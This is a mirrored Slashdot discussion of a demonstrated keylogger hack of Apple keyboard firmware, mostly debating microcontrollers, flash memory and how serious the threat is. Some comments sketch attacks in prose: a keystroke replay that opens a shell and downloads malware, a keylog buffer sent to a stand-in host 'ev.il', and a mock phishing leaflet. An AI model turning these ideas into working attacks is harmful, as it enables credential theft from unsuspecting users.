Slashdot Mirror


Apple Keyboard Firmware Hack Demonstrated

Anonymouse writes with this excerpt from SemiAccurate: "Apple keyboards are vulnerable to a hack that puts keyloggers and malware directly into the device's firmware. This could be a serious problem, and now that the presentation and code (PDF) are out there, the bad guys will surely be exploiting it. The vulnerability was discovered by K. Chen, and he gave a talk on it at Black Hat this year (PDF). The concept is simple: a modern Apple keyboard has about 8K of flash memory, and 256 bytes of working RAM. For the intelligent, this is more than enough space to have a field day. ... The new firmware can do anything you want it to. Chen demonstrated code which, when you put in a password and hit return, starts playing back the last five characters typed in, LIFO. It is a rudimentary keylogger; a proof of concept more than anything else. Since there is about 1K of flash free in the keyboard itself, you can log quite a few keystrokes totally transparently."

275 comments

  1. Huh?? by nurb432 · · Score: 4, Insightful

    Why does a keyboard even need flash in the first place? Being a keyboard isn't a complex job.

    --
    ---- Booth was a patriot ----
    1. Re:Huh?? by anss123 · · Score: 1, Insightful

      Why does a keyboard even need flash in the first place? Being a keyboard isn't a complex job.

      Flash chips are cheap these days.

      And what's to stop people from simply installing a tiny key logging chip inside your keyboard? Seems less trouble than writing crummy firmware hacks, and it's not like I'd notice an extra chip inside my keyboard.

    2. Re:Huh?? by Anonymous Coward · · Score: 5, Informative

      Modern peripherals have microcontrollers that are basically tiny computers all on one chip. They have program flash, data registers, and sometimes data flash or EEPROM memory. They are basically small computers at about $1.00 a pop, and are generally more affordable than custom silicon for most low-speed applications (i.e. less than 20 MIPS).

    3. Re:Huh?? by MaskedSlacker · · Score: 1, Insightful

      The need for physical access? Sure, someone intentionally spying on YOU might do it, but for someone looking to keylog as many credit card numbers as possible it'd be kinda difficult/pointless.

    4. Re:Huh?? by Anonymous Coward · · Score: 0

      A keyboard these days is a big switch matrix made of conductive ink on mylar and a microcontroller to decode the keys and whatever protocol your host wants.

      Like it or not, FLASH is what you get on microcontrollers these days. Few if any of the devices are EPROM based anymore. By making the same part generic and programmable, you get huge volume and lower price.

    5. Re:Huh?? by nurb432 · · Score: 1

      Ok, I should have clarified that I meant 'user writable' flash.

      --
      ---- Booth was a patriot ----
    6. Re:Huh?? by Anonymous Coward · · Score: 0

      ...microcontrollers that are basically tiny computers all on one chip.

      You felt the need to explain what a microcontroller is on Slashdot? What next, you're going to explain how the computer does math in "binary" which are ones and zeros?

    7. Re:Huh?? by UltimApe · · Score: 1

      Yes, because the original question he was answering seemed equally ill-informed. If the original question needed to be asked, it'd be likely that they didn't know what a microcontroller was.

      --
      "Infecting minds with my own memetic virus, one post at a time." Ultimape
    8. Re:Huh?? by ionix5891 · · Score: 0, Troll

      DRM... knowing Apple...

    9. Re:Huh?? by Darkness404 · · Score: 1

      I'm assuming so it can be reprogrammed to change between the multiple keyboard layouts without much of a hardware change other than changing the keycaps.

      --
      Taxation is legalized theft, no more, no less.
    10. Re:Huh?? by ettlz · · Score: 4, Funny

      Probably unimplemented DRM. By forming a secure input path, it furnishes printed material content protection --- by stopping you from typing it in.

    11. Re:Huh?? by Anonymous Coward · · Score: 0

      What next, you're going to explain how the computer does math in "binary" which are ones and zeros ?

      Damn it, all this time I was thinking it used 0-9 like everyone else does.

    12. Re:Huh?? by Brian+Gordon · · Score: 1

      You guys need to go back to elementary school. Everyone does math with 1-10.

    13. Re:Huh?? by anss123 · · Score: 1, Insightful

      The need for physical access?

      You need physical access for flashing the keyboard, unless you have taken over the Mac's OS. In the latter case you can install a key logger in the OS, so why bother with the keyboard. Also you need to get the key data somehow out of the keyboard, so without OS control you have to straddle over and collect it yourself.

      Hey, why are you connecting your laptop to my keyboard....

      Point is, this security vulnerability is no big deal.

    14. Re:Huh?? by Jeremy+Erwin · · Score: 1

      Damn it, all this time I was thinking it used 0-9 like everyone else does.

      You're probably thinking of ENIAC

    15. Re:Huh?? by beelsebob · · Score: 1

      Why on earth would you do that in the hardware level? The keyboard just sends key codes, not characters to the OS, it's the OS's job to map them onto characters.

    16. Re:Huh?? by MMC+Monster · · Score: 1

      If these are recent (last 2-3 year) keyboards, the ones I have double as non-powered USB hubs.

      The idea is that you plug in your mouse and Wacom tablet or other input device directly into the keyboard instead of snaking a couple extra wires to the computer.

      Pretty nifty (until now, that is).

      --
      Help! I'm a slashdot refugee.
    17. Re:Huh?? by nedlohs · · Score: 4, Insightful

      I'm pretty sure it's easier for me to get some code to run on your machine than it is for me to break into your house and install a logger inside your keyboard.

    18. Re:Huh?? by anss123 · · Score: 1

      I'm pretty sure it's easier for me to get some code to run on your machine than it is for me to break into your house and install a logger inside your keyboard.

      If you can break into my machine, install a flash based key logger and have that transmit data over the internet back to you, then you could have saved yourself the problem of using a flash based key logger - as you obviously have control of the OS and can keylog far more than one thousand keystrokes.

    19. Re:Huh?? by Anonymous Coward · · Score: 1, Insightful

      Unless the firmware was hacked before you received your new keyboard...

    20. Re:Huh?? by nedlohs · · Score: 2, Insightful

      But if you removed the logger, say by reinstalling the OS or whatever, I would lose that. With it in the keyboard you need to also replace that (or reflash it of course).

    21. Re:Huh?? by anss123 · · Score: 1

      Unless the firmware was hacked before you received your new keyboard...

      Which still leaves you the problem of retrieving the data.

    22. Re:Huh?? by mattventura · · Score: 4, Insightful

      The only possible reason I could think for someone doing this is because it would work cross-OS, and even on boot sequences before a normal keylogger would be activated, so you could do this to steal a disk encryption password.
      You could use it constructively, though. You could block the key sequences used to boot off a CD or external drive, which could actually be a useful feature for corporations or schools wanting to prevent booting from external media, since the other methods to prevent that don't work that well.

    23. Re:Huh?? by Anonymous Coward · · Score: 0

      Because this tool just sends messages to a HID device, AFAIK, it can be run as any user, admin or otherwise. Want the root password on somebody's Mac OS X box? All you need is a shell account.

    24. Re:Huh?? by RoFLKOPTr · · Score: 1

      Any security vulnerability like this is a big deal... ESPECIALLY when security is one of the primary things that Apple advertises about its OS and hardware. What's to stop the compromised keyboard from sending the keylogged data to an FTP server like just about every other trojan on the planet? Also, a virus scanner could easily remove a trojan from the OS, while finding it in the keyboard's firmware would be a somewhat more difficult task.

    25. Re:Huh?? by anss123 · · Score: 1

      The only possible reason I could think for someone doing this is because it would work cross-OS, and even on boot sequences before a normal keylogger would be activated, so you could do this to steal a disk encryption password.

      That is a good point, but only for attacking those dual booters and disk encrypters (the latter perhaps being the most useful as you could then steal the disk and get the data - assuming you can't copy it to a USB stick or download it over the net for some reason.)

      You could use it constructively

      You could be onto something there, but there's probably programmable keyboards better suited for this already :-)

    26. Re:Huh?? by anss123 · · Score: 1

      Because this tool just sends messages to a HID device, AFAIK, it can be run as any user, admin or otherwise. Want the root password on somebody's Mac OS X box? All you need is a shell account.

      Hmm, didn't realize you could do this from user mode. That's more serious, yes. You still need a "shell account" though. Most people don't hand those out.

    27. Re:Huh?? by anss123 · · Score: 1

      What's to stop the compromised keyboard from sending the keylogged data to an FTP server like just about every other trojan on the planet?

      A compromised keyboard does not automatically have admin access to the OS. Though it might be possible to get your admin password through guessing it's the first thing you write after boot and then moving on from there.

    28. Re:Huh?? by Shamenaught · · Score: 1

      Absolutely, but most non-Slashdotters just count from 2-9 between 1 and 10. Slashdotters have more options, however. Sometimes they'll not count at all between 1 and 10, and sometimes they'll count from 2-F instead.

      Reminds me of an old joke:
      There are only 10 types of people in this world, those who understand binary, and those who don't.

      --
      mysql> SELECT * FROM `places` WHERE `place` LIKE 'home`; Empty set (0.00 sec)
    29. Re:Huh?? by Shamenaught · · Score: 2

      How is this comment trolling? The prospect that they could make a keyboard that wouldn't work with a non-mac keyboard was something I considered when I saw this article. I mean, there was the story a few weeks ago where palm pre's firmware was emulating apple hardware and apple was getting its knickers in a twist. Having some provision in future hardware that makes apple hardware only work with apple hardware strikes me as a logical extension.

      --
      mysql> SELECT * FROM `places` WHERE `place` LIKE 'home`; Empty set (0.00 sec)
    30. Re:Huh?? by Eternauta3k · · Score: 1

      Like it or not, FLASH is what you get on microcontroller these days. Few if any of the devices are EPROM based anymore. By making the same part generic and programmable, you get huge volume and lower price

      Flash? EPROM? Don't they just order a couple million masked chips?

      --
      Yeah. Would you choose a neurosurgeon who pokes around people's brains in his spare time? I wouldn't.
    31. Re:Huh?? by aztracker1 · · Score: 1

      More likely so that the same hardware can be used for multiple languages & key templates. Not to mention such a thing could be useful for gaming keyboards.

      --
      Michael J. Ryan - tracker1.info
    32. Re:Huh?? by CarpetShark · · Score: 0

      Being a keyboard isn't a complex job.

      Apple keyboards are also USB hubs. I prefer my USB devices to be flash upgradeable, especially if they're hubs or will be around for a long time (like a keyboard) or something like that.

      Also... keyboards SHOULD be complex. They're the primary input method, and they're inputting codes that get mapped to something very complex: unicode. If I want my keypad-minus to enter a chinese ideograph, even at a unicode console when the GUI hasn't come up (say, because I have a unicode filename with the solution in there) then it should be able to do that.

    33. Re:Huh?? by RalphSleigh · · Score: 4, Informative

      No, it's your OS's job to decide what pressing keypad-minus does, the keyboard should simply tell the OS that keypad-minus key was pressed

      --
      Come as you are, do what you must, be who you will.
    34. Re:Huh?? by Anonymous Coward · · Score: 0

      I just replied to your blog. This is what I wrote.

      It seems that the example I typed up broke. I meant:

      do
          x <- MonadInstance a
          y <- MonadInstance b
          return (x + y)

      is equivalent to

      MonadInstance a >>= ( \x -> (MonadInstance b >>= ( \y -> return (x + y) )))

      If this code runs at all, the function bindings force the order of evaluation.

      Even if the runtime is making promises (thunks in Haskell-speak), it is going to have to unroll those promises and compute x before it can compute f x in a computation (A x) >>= f. There's just no way around that. If an operation is going to occur at all, laziness can't change the order in which its sub-operations occur. It merely means that the runtime performs computations on demand.

      Beta reduction is what allows different computational orders, depending on the functional argument dependency tree. For example, in the computation f (g x) (h y), (g x) or (h y) can be computed first, but they BOTH have to be computed before f (g x) (h y) (the whole thing).

      But the whole point of a monad is that the monadic combinators bind the output of one computation to the input of a one argument function. There is no ambiguity about the order of f $ g $ h $ i $ k, and laziness will not change the order in which these functions are called. k goes first. The monadic combinators have semantics similar to the application operator $.

      http://en.wikipedia.org/wiki/Beta_reduction

      Also note the Control.Monad documentation (http://www.haskell.org/ghc/docs/latest/html/libraries/base/Control-Monad.html#v%3A%3E%3E%3D), which describes the semantics of >>= and >> as:

      (>>=) Sequentially compose two actions, passing any value produced by the first as an argument to the second.

      (>>) Sequentially compose two actions, discarding any value produced by the first, like sequencing operators (such as the semicolon) in imperative languages.

      Laziness does not change the order in which operations occur. Beta-reduction (what the Haskell literature calls "non-strict reduction" or "evaluation") is what does that. These are related but NOT synonymous. You can have an eager, non-strict language. Or lazy and strict semantics. A web server like Apache is lazy and potentially strict as a computational system, since it lazily dispatches requests to a runtime of your choice.

      http://www.haskell.org/haskellwiki/Lazy_vs._non-strict

    35. Re:Huh?? by RoFLKOPTr · · Score: 1

      A compromised keyboard does not automatically have admin access to the OS.

      I didn't say it would have access to the OS? When was that ever brought up? A compromised keyboard has access to everything you type, so it will have access to all your computer account passwords (because software won't need to be running before login because it will be hardcoded into your keyboard), your bank account and PayPal passwords (because none of them allow your browser to store it), your chats with young children online... everything. That can be considered even worse than having admin access to the OS, because wipe your hard drive to get rid of it as many times as you want and it will still be there.

    36. Re:Huh?? by Anonymous Coward · · Score: 1, Insightful

      Just add a piece of paper to the box:

      "Congratulations on your purchase of a new mac! You're probably a former windows user looking to escape from daily crashes and insecure applications, so please take a moment to read these instructions and familiarize yourself with your new mac's security features!

      One new feature we have added is extra encryption for your bank and credit card webpages. To activate this encryption, please visit each of your banks and credit card's websites (be sure to type the URL, do not click on any links in your emails as hackers can send you fake links that look real) and log in.

      After logging in to each of these websites, visit our enhanced encryption website at http://bankencrypter.com/ You will be asked to type an easy-to-read captcha (an image designed to prove that you're human, rather than a hacker). Once you have done so, the encryption process for that site will be complete and you will be extra secure!

      Note: While our encryption is designed for bank accounts and credit card websites, you can use it for your e-mail as well. Just follow the steps above to enable extra security to your webmail account!"

    37. Re:Huh?? by anss123 · · Score: 1

      I didn't say it would have access to the OS?

      Without access to the OS the keyboard will not be able to send the data anywhere.

    38. Re:Huh?? by prockcore · · Score: 1

      Ah but the keyboard needs to understand how keycodes change for Shift/Ctrl/AltGR/etc.

    39. Re:Huh?? by Anonymous Coward · · Score: 0

      Right. "Hey, why are you connecting your laptop to my keyboard....". That's exactly what anyone looking at the situation would ask.

      And not, oh, say, "why do you need to connect my keyboard to your laptop". No, can't think of any possible excuse that would justify that particular scenario, not even having just spilled coffee on the laptop's keyboard or for other reasons having the keys flake out even though I need to write something urgent and the laptop takes USB keyboards just fine.

      In other words: learn to think..

      "Why are you connecting your laptop to my keyboard...", my god.

    40. Re:Huh?? by Ihmhi · · Score: 1

      They did this on The Real Hustle: switched a keyboard in an office with an identical keyboard that had a keylogging chip added in. It was quite interesting.

    41. Re:Huh?? by Tacvek · · Score: 1

      Keyboards with built-in hubs have been around nearly as long as USB keyboards. The idea would be that you plug your mouse, and perhaps your joystick, into the keyboard, using only one USB port on the computer for all your major input devices. These days, a hub built into the keyboard is often the most convenient USB port for flash drives.

      Similarly, it was thought that your monitor might be a USB device (not fully USB, still using a VGA or DVI cable for the video image, but perhaps passing monitor configuration data (brightness, contrast, etc.) as well as power management data.) The monitor would also be a USB hub, into which your speakers and microphone were connected.

      Thus all your essential components took up only 2 of your computer's USB ports, leaving the rest for other devices (such as printers or scanners, or mp3 players, or whatnot).

      --
      Stylish sheet to fix many problems in Slashdot's D3: https://gist.github.com/801524
    42. Re:Huh?? by adolf · · Score: 1, Insightful

      Mac user: "What's a shell account?"

      Linux user explains the whole thing.

      Mac user: *head explodes*

    43. Re:Huh?? by hey! · · Score: 1

      Oh, it's no big deal now, but if the keyboards get a little more powerful it isn't hard to think of ways of exploiting them.

      One obvious advantage to infecting a keyboard is conventional methods for dealing with malware aren't going to detect the infection. It has a lot of the same advantages as a BIOS virus.

      One could conceivably infect a whole shipment of keyboards headed for a company for industrial espionage purposes. Resources are currently pretty slim for doing much more, but if we imagine keyboards getting a little more powerful, then it won't be necessary to get physical access to the keyboard. The keyboard could be programmed to log in to the computer at 3AM (using your password) and fire up a command line to send the password to some Internet site.

      This is kind of a wake-up call. Sooner or later somebody will dream up a reason to make keyboards smart enough to be a problem; we can see Apple has already taken the first steps down that road, although we appear to be far from the point where it is a practical concern.

      --
      Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
    44. Re:Huh?? by MrHanky · · Score: 0

      It's amazing what bullshit you Mac fanboys will spew out to defend Apple's shortcomings.

    45. Re:Huh?? by ChunderDownunder · · Score: 1

      The potential being that a user can change the keyboard to, say, "US English" or "International" without requiring the OS to explicitly support it?

      Then one could plug a keyboard into OS X, XP, Gnome, Haiku etc and not have to mess around configuring the settings each time. Which in shared households would mean 'Gary' just plugs in his $5 US English keyboard set to international with all the weird symbols to do his Spanish/German homework and the rest of the family use their own and don't have to reset the keyboard layout if he forgets. Short of buying an international keyboard, the keyboard itself could remember which layout it's using, independent of the computer or OS. (Maybe they can already, I'm just thinking aloud!)

    46. Re:Huh?? by x2A · · Score: 1

      "so it will have access to all your computer account passwords"

      Big deal.

      "your bank account and PayPal passwords"

      So what?

      "your chats with young children online"

      *falls off chair* f#&k me I'm burning this thing!

      --
      The revolution will not be televised... but it will have a page on Wikipedia
    47. Re:Huh?? by Anonymous Coward · · Score: 0

      Imagine a replay attack. I'll describe a Linux variant. The main trick would be running some long-term pattern recognition to infer things like passwords, e.g. noticing the common sequence first typed after long delays, to login or unlock a screen saver. Then, longer delays still to notice idle periods when the user seems to be away (having access to wall clock time might be helpful for this hack), since you do not want an audience for your replay attack on the login facility.

      When the user is perhaps not watching, start playing out some key presses to switch virtual consoles, login, and execute some shell commands. Or on a graphical system, if there is a common hotkey sequence to launch a terminal program, do that and get the same effect.

      The best use might be to have the keyboard "hack" the system and bootstrap some larger malware by first getting a tiny agent in via the shell. This little agent needs to be able to determine when the system is networked, and then can download more complex malware. It also needs to be able to hide itself. Unlocking an existing session and using it would be one way to reduce the footprint of log messages, compared to starting a new session on a virtual console.

      This is so freaking scary and obvious to me, it makes me realize that paranoid people should be using multi-factor authentication to their systems to prevent replay attacks like this.

    48. Re:Huh?? by Anonymous Coward · · Score: 0

      Oooh, lemme write that one down, never heard that before...

    49. Re:Huh?? by Divebus · · Score: 1

      So the security fix is to run the palm of your hand around the keyboard a few times before you leave. At least 1k worth.

      --
      Most of the stuff on /. won't survive first contact with facts.
    50. Re:Huh?? by AHuxley · · Score: 1

      It's Apple, nobody else is going to take the $ and time to make it work right.
      To talk to the OS, apps, hardware etc. Also Apple had to issue a fix for the physical type flow so it felt like a keyboard and not a broken keyboard.
      So that's Apple's side - they needed to be able to update, fix and reach in deep.
      As to why it feels open and useful to malware, could be generational?
      Too few developers, so much work, keep the keyboard code simple and useful for a later OS idea?

      --
      Domestic spying is now "Benign Information Gathering"
    51. Re:Huh?? by petermgreen · · Score: 3, Insightful

      Dealing with USB however is something that requires a reasonably powerful microcontroller with quite complex firmware. Most current microcontrollers are flash based and in many cases are likely to have more flash than the application needs.

      --
      note: I'm known as plugwash most places but I screwed up registering that here somehow in the past and now can't register
    52. Re:Huh?? by adolf · · Score: 1

      Wow. The mods sure do have a peculiar sense of humor when it comes to anything Apple.

      This saddens me.

    53. Re:Huh?? by GigaplexNZ · · Score: 1

      You could block the key sequences used to boot off a CD or external drive, which could actually be a useful feature for corporations or schools wanting to prevent booting from external media, since the other methods to prevent that don't work that well.

      BIOS passwords are rather effective, actually.

    54. Re:Huh?? by Anonymous Coward · · Score: 0

      DRM... knowing Apple...

      You don't know Apple.

    55. Re:Huh?? by beelsebob · · Score: 1

      No it doesn't, the keyboard needs to send "key 185 down" when the user presses shift, and "key 185 up" when they release it (note making up the code).

      It's the OSes job to determine how that modifies translation from keycode to character.

    56. Re:Huh?? by Anonymous Coward · · Score: 0

      I'm pretty sure it's easier for me to get some code to run on your machine than it is for me to break into your house and install a logger inside your keyboard.

      go for it. i'm waiting...

    57. Re:Huh?? by tyrione · · Score: 0

      It's amazing what bullshit you Mac fanboys will spew out to defend Apple's shortcomings.

      What's amazing is you being a complete douche by flaming someone who a few comments later is vindicated, more formally, with actual facts on the point of this flash. Keep being a dick and thinking Linux invented shells, so on and so forth. I prefer knowing multiple operating systems, how kernels inter-operate with I/O devices and more as progress continues. Then again, there is a growing hard on group of "security experts" who make the Bush administration seem sane by their doomsday scenarios they present.

    58. Re:Huh?? by MrHanky · · Score: 1

      "Vindicated"? Everything he says from "Also..." on is bullshit. The keyboard outputs a keycode, the OS decides what to do with it, like turning it into a unicode character. A keyboard doesn't know what character it will put on the screen.

      I'm not sure what the point of your comment is, since the only "actual fact" in it is that I flamed a guy: so what. And you have the nerve to mention the phrase "actual facts", just before veering into the most retarded strawman attack I've seen this century. It makes you come across as a total moron, not as someone "knowing multiple operating systems, how kernels inter-operate with I/O devices and more". Which you most likely don't.

    59. Re:Huh?? by Anonymous Coward · · Score: 0

      As opposed to simply plugging in a different keyboard? A flexible/fold-able keyboard sets you back about $5.

    60. Re:Huh?? by MrMacman2u · · Score: 1

      Illogical extension actually. All Apple would have needed to do to prevent their keyboards and mice from working with anything other than Apple Hardware is write a custom driver and create a custom firmware. Bam, done.

      I know this may sound like a hassle to you or I, but to a hardware/software company like Apple? No prob.

      But they haven't and in fact have been issuing stock standard HID compliant keyboards and mice for nearly a decade now.

      Perhaps they got these controllers on the cheap, cheaper than pre-printed deals. Perhaps they are planning on making a more flexible keyboard, or expanding the functionality of future keyboards that would require the use of a microcontroller.

      No one except Apple knows for sure. ionix's comment was trolling, if only lightly so.

      --
      This signature is lame.
    61. Re:Huh?? by vcompiler · · Score: 1

      And what's to stop people from simply installing a tiny key logging chip inside your keyboard?

      Now they know the cost. From now on, designers must be aware of the support cost incurred by installing every individual unnecessary chip.

    62. Re:Huh?? by FridgeFreezer · · Score: 1

      Because a universal microcontroller (such as Freescale s08 series) is cheaper than a dedicated keyboard chip.

      --
      There is no music - home taping killed it.
    63. Re:Huh?? by Shamenaught · · Score: 1

      Hmm? Your suggested method to stop apple keyboards and mice working with other systems requires a custom firmware, which would either require flash memory on the keyboard or a hardware redesign. Would it really be more of an effort to put a little check in the keyboard firmware than it would to rewrite both firmware and drivers? I'm not saying this is something Apple are likely to do, but it strikes me your suggestion is less logical than mine.

      I personally am of the opinion that it was just cheaper to bulk-buy general chips than to get some custom-made, but that doesn't mean the considered scenario hadn't crossed my mind. Can you really say it hadn't crossed ionix's mind either?

      See, apple has this reputation for locking stuff so that apple only works with apple. They have software that only syncs with their hardware devices, proprietary disk image formats, and so on. I don't consider the suggestion that something else they're doing might be following the same path to be controversial, inflammatory, irrelevant or off-topic.

      Of course the exception to this is Mac Fanboys. For fanboys, linking apple to anything bad is inflammatory, even when it's completely true that apple have done it. In this case, I suspect whoever modded ionix's comment was an apple fanboy, and as such not of sound mind.

      Heck, I'm even contemplating a mac laptop as my next computer purchase. Ridiculously blinkard fanboys who can't stand to see even the deserved tarnishes to the mac brand, however, make me want to distance myself from macs altogether.

      --
      mysql> SELECT * FROM `places` WHERE `place` LIKE 'home`; Empty set (0.00 sec)
    64. Re:Huh?? by Sjefsmurf · · Score: 1

      Who on earth wants to break into your house anyway? Now... some hacked keyboards at the NSA, White House or Pentagon which can snoop interesting stuff without any traceable changes to the OS or the HW except some code lines in the firmware, then we are talking. Serviceman comes in one day, replaces the keyboard with a hacked unit. Finds an excuse to come back a bit later to pick it up again, including data.

    65. Re:Huh?? by AmiMoJo · · Score: 1

      The reason is because they use cheap Cypress microcontrollers, and the flash memory/RAM is just a standard feature of them. You can disable re-programming and prevent reading the flash memory, but apparently Apple didn't.

      Unfortunately firmware updates seem to be becoming more common. Even my Samsung TV has them.

      --
      const int one = 65536; (Silvermoon, Texture.cs)
      SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
    66. Re:Huh?? by AmiMoJo · · Score: 1

      Yes, but it's easier for my anti-virus software to detect something installed on my PC. It would be virtually impossible to detect a hardware based keylogger, especially one which is built into the keyboard and can't be seen sticking out the back of the machine.

      --
      const int one = 65536; (Silvermoon, Texture.cs)
      SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
    67. Re:Huh?? by AmiMoJo · · Score: 1

      Actually, sub £1 Atmel AVRs can do USB in firmware (google V-USB), or you can get sub £1 versions with a USB controller built in.

      What worries me is that Apple seem to be taking the ability to update firmware as a license to release products before they are fully tested. I mean, it's a keyboard and it has firmware updates. How much of an epic fail do you have to have when you can't even design a keyboard, by far the most common computer peripheral, that just works. Even the cheapest keyboards work fine, and this is supposed to be an Apple premium product.

      --
      const int one = 65536; (Silvermoon, Texture.cs)
      SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
    68. Re:Huh?? by cicuz · · Score: 1

      Isn't removing the motherboard's battery for a couple of minutes rather effective also?

    69. Re:Huh?? by GigaplexNZ · · Score: 1

      Only if the password is stored in volatile memory, which isn't always the case. And if one has physical access to the hardware to reset the password, they also have physical access to reflash the firmware to remove the block.

    70. Re:Huh?? by ivan256 · · Score: 1

      Um, no. You can't do it from user mode. The technique described uses a debugger to attach to the firmware updater with a breakpoint after the privilege escalation.

    71. Re:Huh?? by xouumalperxe · · Score: 1

      In the latter case you can install a key logger in the OS, so why bother with the keyboard?

      Because, if you detect that the OS was compromised, you're reasonably likely to scour it. But nobody expects a hacked keyboard.

    72. Re:Huh?? by gumbi+west · · Score: 1

      Here is a question: if the computer has shell accounts for untrusted users, what admin is using a keyboard attached to that machine when users can log in?

    73. Re:Huh?? by Lars+T. · · Score: 1

      BIOS passwords are rather effective, actually.

      Not so much if somebody put a keylogger in your keyboard.

      --

      Lars T.

      To the guy who modded me down from perfect to terrible Karma - Apple haters still suck

    74. Re:Huh?? by GigaplexNZ · · Score: 1

      And if they are capable of flashing the firmware on the keyboard to hijack the BIOS password (which only works if someone has entered the correct BIOS password recently, which doesn't happen often) they are capable of flashing the firmware on the keyboard to remove the key sequence blocker.

    75. Re:Huh?? by mikiN · · Score: 1

      haa, just wait until the user types something like:

      persiankitty.com

      then the keyboard quickly expands this to something like:

      persiankitty.com.ev.il/s=[url encoded keylog buffer]

      in the blink of an eye.

      Simply make ev.il be on a really fast server that immediately redirects the user to persiankitty.com so as not to notice anything... (sorry Israelis, don't want to make you look bad (well, except maybe the Mossad, cough...), except ev.il's a convenient suffix)

      --
      The Hacker's Guide To The Kernel: Don't panic()!
    76. Re:Huh?? by mikiN · · Score: 1

      addendum: ...the user types something like:

      persiankitty.com

      [and hits the Enter key]

      then the keyboard quickly expands this... ...and adds back the Enter key at the end.

      --
      The Hacker's Guide To The Kernel: Don't panic()!
    77. Re:Huh?? by iamacat · · Score: 1

      Since when is Apple a proponent of DRM? They kept it on music just until the labels relented.

    78. Re:Huh?? by Anonymous Coward · · Score: 0

      Why exactly would a USB hub or keyboard need a firmware upgrade. The USB spec ain't changing. Yes, there'll be a new version of USB out soon, but you'll need new hardware to take advantage of it anyway.

  2. Flash memory in a keyboard? by lorenlal · · Score: 2, Insightful

    Pardon my ignorance. I have a lot of it. What is the advantage of having flash memory in a keyboard? I remember that the keyboard (at least at one time, I don't know if that's still the case) used an interrupt call to process input... But the load the keyboard placed on system resources should be so low, that there wouldn't be a need to offload that right? I have to be missing something here. It seems to me that by having something like this, you're just begging for trouble since it opens another attack surface. Anywhere you have processing and memory is a place for malware to reside. This doesn't impress me much Apple.

    1. Re:Flash memory in a keyboard? by TheRaven64 · · Score: 5, Informative

      It's a USB keyboard. That means that it communicates with the host via quite a complex protocol. A keyboard is not just a 'send a specific 8-bit signal when each button is pressed or released' device anymore. The amount of logic needed is not very large, but it's a lot more than a PS/2-style keyboard needed. The firmware could have been in ROM, but these days Flash is about as cheap as ROM and gives you the option of distributing fixes if you find bugs after the device ships.

      --
      I am TheRaven on Soylent News
    2. Re:Flash memory in a keyboard? by Wingman+5 · · Score: 1

      The main disadvantage to current keyboards that I see is that they only allow 3-6 concurrent key presses. That may not be an issue when typing frequently, but if you modify the keyboard to be the capture source for a MAME cabinet that can be an issue. Perhaps the RAM and firmware are to get around this issue.
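
      As an added illustration of where that six-key ceiling comes from (example code written for this page; it is not firmware from Apple or any other vendor): a USB keyboard in the HID boot protocol sends an eight-byte report, a modifier bitmap, a reserved byte and six keycode slots. Modifier keys are bits and never consume a slot, but a seventh ordinary key cannot be represented, so the keyboard reports ErrorRollOver (usage 0x01) in every slot and the host keeps its previous key state. The usage IDs in the sample chords follow the HID usage tables; the function name is an assumption.

```c
/* Example added for this thread: packing pressed keys into a USB HID
 * boot-protocol keyboard report. Constructed here; not Apple's (or any
 * vendor's) keyboard firmware. Usage IDs follow the HID Usage Tables. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define HID_REPORT_LEN   8      /* modifiers, reserved, six keycode slots */
#define HID_MAX_KEYS     6      /* why "six-key rollover" is the usual ceiling */
#define HID_ERR_ROLLOVER 0x01   /* usage reported in every slot when > 6 keys */
#define HID_MOD_FIRST    0xE0   /* LeftControl; LeftShift 0xE1 ... RightGUI 0xE7 */
#define HID_MOD_LAST     0xE7

/* Build a boot-protocol report from the usage IDs currently pressed.
 * Byte 0: modifier bitmap (bit n set for usage 0xE0 + n), byte 1: reserved,
 * bytes 2..7: ordinary keycodes. Returns how many ordinary keys were pressed,
 * so a caller can tell that roll-over (rather than a real chord) was sent. */
size_t hid_build_report(const uint8_t *pressed, size_t n, uint8_t report[HID_REPORT_LEN])
{
    size_t keys = 0;
    memset(report, 0, HID_REPORT_LEN);
    for (size_t i = 0; i < n; i++) {
        uint8_t usage = pressed[i];
        if (usage >= HID_MOD_FIRST && usage <= HID_MOD_LAST) {
            /* Modifiers are bits, not slots: Ctrl+Alt+Shift+GUI cost nothing */
            report[0] |= (uint8_t)(1u << (usage - HID_MOD_FIRST));
        } else if (usage != 0) {
            if (keys < HID_MAX_KEYS)
                report[2 + keys] = usage;
            keys++;
        }
    }
    if (keys > HID_MAX_KEYS) {
        /* The report cannot express the chord; signal ErrorRollOver in every
         * slot. The host ignores such a report and keeps the previous key
         * state, which is why a MAME cabinet needing seven simultaneous
         * buttons loses input here. */
        memset(report + 2, HID_ERR_ROLLOVER, HID_MAX_KEYS);
    }
    return keys;
}

static void print_report(const char *label, const uint8_t *r)
{
    printf("%-22s", label);
    for (int i = 0; i < HID_REPORT_LEN; i++) printf(" %02x", r[i]);
    putchar('\n');
}

int main(void)
{
    uint8_t r[HID_REPORT_LEN];
    const uint8_t chord[] = { 0xE0, 0x04, 0xE1, 0x05 };               /* LeftCtrl, a, LeftShift, b */
    const uint8_t seven[] = { 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A }; /* a..g */
    hid_build_report(chord, sizeof chord, r);
    print_report("Ctrl+Shift+a+b:", r);        /* 03 00 04 05 00 00 00 00 */
    hid_build_report(seven, sizeof seven, r);
    print_report("seven letters:", r);         /* 00 00 01 01 01 01 01 01 */
    return 0;
}
```

      Keyboards advertising N-key rollover get past this only by leaving the boot protocol and describing a larger report (typically a bitmap with one bit per usage) in their own report descriptor, which is extra descriptor and firmware logic on the device, not something the OS can add.
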

    3. Re:Flash memory in a keyboard? by unfunk · · Score: 1

      I'm curious too. I'd be surprised if my Logitech G15 keyboard had read/write memory (all the programs for it run on the OS), so just why the hell does Apple feel the need to make a keyboard with that?

    4. Re:Flash memory in a keyboard? by Anonymous Coward · · Score: 1, Informative

      I wouldn't be surprised. Modern gaming devices with programmable buttons often store those macros on the device itself, (e.g. the N52te) in order to allow it to work on any computer it's plugged into without needing the extra software - all you need the software for is to program it.

    5. Re:Flash memory in a keyboard? by TJamieson · · Score: 1

      +5 Informative. In fact, the laptop keyboards also have a bit of flash, and Apple has updated a whole host of keyboard firmware over time.

      --
      For the last time, PIN Number and ATM Machine are redundancies!
    6. Re:Flash memory in a keyboard? by mlts · · Score: 3, Interesting

